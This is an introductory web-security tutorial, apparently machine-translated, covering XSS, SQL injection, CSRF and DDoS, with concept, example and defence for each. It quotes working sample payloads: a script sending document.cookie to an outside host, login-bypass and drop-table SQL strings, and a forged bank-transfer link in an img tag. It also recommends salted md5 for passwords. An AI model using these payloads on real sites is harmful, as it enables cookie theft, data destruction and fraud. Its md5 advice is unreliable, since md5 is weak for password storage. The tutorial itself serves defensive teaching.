This article briefly introduces several common attack methods and their defense methods.
• XSS (cross-site scripting attack)
• CSRF (cross-site request forgery)
• SQL injection
• DDOS

XSS

concept
• The full name is Cross Site Scripting, which means that an attacker embeds a malicious script in a web page.
case
• For example, I wrote a blog site, and the attacker posted an article on it, such as <script>window.open(“www.gongji.com?param=”+document.cookie)</script> If I don’t process his content and store it directly in the database, the next time the other user accesses his article, the server reads it from the database and then responds to the client. The browser executes the script. And then send the user’s cookie to the attacker’s server.
The cause of the attack
• The data entered by the user becomes the code. For example, the <script> above should be just a string but has the effect of the code.
prevention
• Escape the input data, for example, <transfer to &lt;

SQL injection

concept
• masquerading as a normal http request parameter through the sql command, passed to the server, the server executes the sql command to attack the database
Case
• ‘ or ‘1’ = ‘1. This is the most common SQL injection attack. When we lose the username jiajun and then enter the password as ‘or ‘1’ = ‘1, when we query the username and password are correct, we are going to execute select * From user where username=” and password=”, after the parameter is spliced, the sql statement will be executed select * from user where username=’jaijun’ and password=’ ‘ or ‘ 1’=’1 ‘, this time 1= 1 is established, naturally skip the verification.
• But if it is more serious, the password is changed as ‘;drop table user;–, then the sql command is select * from user where username=’jiajun’ and password=”;drop table user;–‘ this time We will delete this form directly.
The cause of the attack
• The sql statement falsifies the parameters, and then forms a destructive sql statement after splicing the parameters, which eventually causes the database to be attacked.
prevention
• In java, we can use the pre-compiled statement (PreparedStatement), so that even if we use the sql statement to pseudo-parameter, when the server is on the server, the parameters of the fake sql statement are just simple characters, and can not play the role of attack. .
• Many orm frameworks can already escape parameters
• Do the worst, even if it’s been ‘dumped’ (‘Pee pants, database leaks’). The password in the database should not be stored in plain text. You can use md5 to encrypt the password. In order to increase the cost of cracking, you can use salt (database storage user name, salt (random character length), md5 ciphertext).

CSRF

concept
• The full name is cross site request forgery, which refers to access by masquerading as a trusted user. In layman’s terms, I visit the A website, then the cookie exists in the browser, and then I visit a rogue. The website, accidentally clicked on a link to the rogue website (send a request to A), this time the rogue website used my identity to access A.
case
• This example may not exist in reality, but the way it is attacked is the same. For example, I logged into the Bank A website, then I visited a rogue website given by my roommate, and then clicked on a link inside www.A.com/transfer?account=666&money=10000, then I am likely to The account number is 666 and the person turned 1w soft sister coin
• Note that this attack method does not necessarily mean that I clicked on the link. It can also be that some resource requests in this website point to this transfer link, for example, an <img src=”http://www.A.com/transfer?account =666&money=10000″>
The cause of the attack
• The user stores the cookie locally, the attacker uses the user’s cookie for authentication, and then forges the user to make a request.
prevention
• The reason for the attack is because the attacker exploits the cookie stored in the browser for user authentication, so if we don’t use cookies to verify it, we can prevent it. So we can use token (not stored in the browser) authentication.
• By referer identification, HTTP Referer is part of the header. When the browser sends a request to the web server, it usually brings a Referer to tell the server which page I am linking from. The server can get some information for processing. . In this case, we must log in to Bank A website to transfer money.

DDOS

concept
• Distributed Denial of Service, which simply means sending a large number of requests to crash the server. DDos attacks are based on DOS attacks. It can be understood in general. Dos is singled out, and ddos ​​is a group. Because of the development of modern technology, the dossile attack has reduced lethality, so DDOS appears. Attackers use public networks. A large number of computer devices are combined to attack one or more targets.
Case
• SYN Flood, simply say tcp three-way handshake, the client first sends a request, requests to establish a connection, and then the server returns a message indicating that the request is accepted, then the client will also return a message, and finally establish a connection. Then, if there is such a situation, the attacker forges the IP address and sends a message to the server to request the connection. At this time, the server accepts. According to the tcp three-way handshake rule, the server also responds to a message, but the ip is forged. Whoever responds to the message, the second handshake has an error, and the third time naturally cannot be carried out smoothly. At this time, the server does not receive the message sent by the client during the third handshake, and repeats the second handshake. Operation. If the attacker forges a large number of ip addresses and makes a request, the server will maintain a very large semi-connected wait list, taking up a lot of resources, and finally the server smashes.
• CC attack, launching an attack on the application layer http protocol, simulating normal users sending a large number of requests until the site refuses service.
The cause of the attack
• The server has insufficient bandwidth to block the attacker’s attack traffic.
prevention
• The most straightforward way to increase bandwidth. But the attacker uses a local computer to attack, his bandwidth does not cost a lot of money, but for the server, the bandwidth is very expensive.
• Cloud service providers have their own complete DDoS solution and provide rich bandwidth resources

to sum up
• A total of 4 attack methods are mentioned above, which are xss attacks (the key is script, using malicious scripts to launch attacks), CSRF attacks (the key is to use local cookies for authentication, forgery to send requests), SQL injection (the key is by using sql Statement forgery parameters to issue attacks), DDOS attacks (the key is to send a large number of requests by means, and finally crash the server)
• The reason why the attacker can successfully attack is that the user operation is a cause. The lack of defense on the server side is a problem. Because the user’s operation cannot be controlled, we need to develop the defense on the server side.
• Don’t feel absolutely safe, just be safer.